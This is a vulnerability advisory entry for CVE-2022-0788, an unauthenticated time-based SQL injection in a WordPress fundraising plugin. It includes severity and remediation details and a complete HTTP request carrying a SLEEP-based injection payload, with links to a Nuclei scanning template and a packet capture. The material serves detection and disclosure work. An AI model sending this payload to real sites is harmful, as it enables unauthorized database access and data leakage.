| Title | WordPress WP Fundraising Donation and Crowdfunding Platform <1.5.0 - SQL Injection |
|---|---|
| Author | theamanrawat |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or manipulation of the WordPress database. |
| Remediation | Update WP Fundraising Donation and Crowdfunding Platform to version 1.5.0 or later to mitigate the vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.45285 |
| CVE ID | CVE-2022-0788 |
| CWE ID | CWE-89 |
| Tags | time-based-sqli cve cve2022 sqli wordpress wp-plugin wp wp-fundraising-donation unauth wpscan wpmet vuln |
WordPress WP Fundraising Donation and Crowdfunding Platform plugin before 1.5.0 contains an unauthenticated SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
GET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0
Connection: close
Content-Length: 87
Content-Type: application/json
Accept-Encoding: gzip
{"id": "(SELECT 1 FROM (SELECT(SLEEP(6)))me)", "formid": "1", "type": "online_payment"}
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-0788.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-0788.pcap
N/AN/A